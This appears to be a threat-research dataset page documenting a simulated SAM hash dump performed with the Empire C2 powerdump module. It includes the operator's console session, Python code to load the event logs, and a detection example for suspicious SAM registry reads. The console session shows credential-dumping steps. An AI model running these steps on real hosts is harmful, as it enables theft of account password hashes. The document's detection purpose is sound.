# Empire Powerdump Extract Hashes

## Metadata

| Contributors | Creation Date | Modification Date | Tactics | Techniques | Tags |
| --- | --- | --- | --- | --- | --- |
| Roberto Rodriguez @Cyb3rWard0g | 2020/09/22 | 2020/09/22 | TA0006 | T1003.002 | Calculating SysKey, SAM Read |

## Dataset Description

This dataset represents adversaries calculating the SysKey in order to decrypt Security Account Manager (SAM) database entries (read from the registry or from a hive file) and obtain the NTLM, and sometimes LM, password hashes of local accounts.

## Simulation Metadata

### Tools

| Type | Name | Module |
| --- | --- | --- |
| C2 | Empire | powerdump |

### Adversary View

```
(Empire: powershell/credentials/mimikatz/sam) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 08:21:35  http

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > usemodule credentials/powerdump*
(Empire: powershell/credentials/powerdump) > info

              Name: Invoke-PowerDump
            Module: powershell/credentials/powerdump
        NeedsAdmin: True
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None

Authors:
  DarkOperator
  winfang
  Kathy Peters
  ReL1K

Description:
  Dumps hashes from the local system using Posh-SecMod's
  Invoke-PowerDump

Comments:
  https://github.com/darkoperator/Posh-
  SecMod/blob/master/PostExploitation/PostExploitation.psm1

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  Agent True        WE8XYD3K                  Agent to run module on.

(Empire: powershell/credentials/powerdump) > execute
[*] Tasked WE8XYD3K to run TASK_CMD_JOB
[*] Agent WE8XYD3K tasked with task ID 4
[*] Tasked agent WE8XYD3K to run module powershell/credentials/powerdump
(Empire: powershell/credentials/powerdump) >
Job started: TASK2D

wardog:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

(Empire: powershell/credentials/powerdump) >
```

## Explore Datasets

### Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive published in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_powerdump_sam_access.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail early if the download did not succeed
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single JSON-lines file; extract it to the working directory
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```

### Read JSON File

```python
import pandas as pd

# The dataset is JSON lines (one event object per line), hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```

### Access Security Events

```python
# Count events per Windows event log channel (Security, Sysmon, ...), largest first
df.groupby(['Channel']).size().sort_values(ascending=False)
```
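The channel breakdown above is the first step; the next is to pull out the events that actually record the "SAM Read" the dataset is tagged with. The following is an added example, not part of the OTRF notebook: it parses a constructed JSON-lines sample with the standard library instead of pandas so it runs offline, and it assumes the Security events carry the usual 4663 registry-access fields (ObjectName, ProcessName, SubjectUserName) and that lsass.exe is the only expected legitimate reader of SAM keys on a workstation.

```python
import json
from collections import Counter

# Constructed sample in the Security-Datasets JSON-lines layout (one event per line).
# Field names follow the Windows Security event schema; every value here is made up.
SAMPLE_JSONL = r"""
{"Channel": "Security", "EventID": 4663, "SubjectUserName": "pgustavo", "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ObjectName": "\\REGISTRY\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4"}
{"Channel": "Security", "EventID": 4663, "SubjectUserName": "WORKSTATION5$", "ProcessName": "C:\\Windows\\System32\\lsass.exe", "ObjectName": "\\REGISTRY\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F5"}
{"Channel": "Security", "EventID": 4663, "SubjectUserName": "pgustavo", "ProcessName": "C:\\Windows\\explorer.exe", "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"}
{"Channel": "Security", "EventID": 4688, "SubjectUserName": "pgustavo", "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
"""

# Assumed allowlist: processes expected to read SAM registry keys on a workstation.
BENIGN_SAM_READERS = {"lsass.exe"}


def load_events(jsonl):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def events_per_channel(events):
    """Same breakdown as the notebook's groupby(['Channel']).size(), as a plain dict."""
    return dict(Counter(e["Channel"] for e in events))


def sam_read_events(events):
    """Security 4663 (object access) events whose object lives under the SAM hive."""
    return [e for e in events
            if e.get("Channel") == "Security" and e.get("EventID") == 4663
            and e.get("ObjectName", "").upper().startswith(r"\REGISTRY\MACHINE\SAM")]


def suspicious_sam_reads(events):
    """SAM reads by a process outside the allowlist: the behaviour this dataset captures."""
    hits = []
    for e in sam_read_events(events):
        image = e.get("ProcessName", "").rsplit("\\", 1)[-1].lower()
        if image not in BENIGN_SAM_READERS:
            hits.append((e["SubjectUserName"], image, e["ObjectName"]))
    return hits


if __name__ == "__main__":
    evts = load_events(SAMPLE_JSONL)
    print(events_per_channel(evts))
    for user, image, obj in suspicious_sam_reads(evts):
        print(f"SAM read by {image} as {user}: {obj}")
```

On the real dataset, replace SAMPLE_JSONL with the contents of datasetJSONPath; the lsass.exe read is the control case that a filter on 4663 alone would wrongly flag.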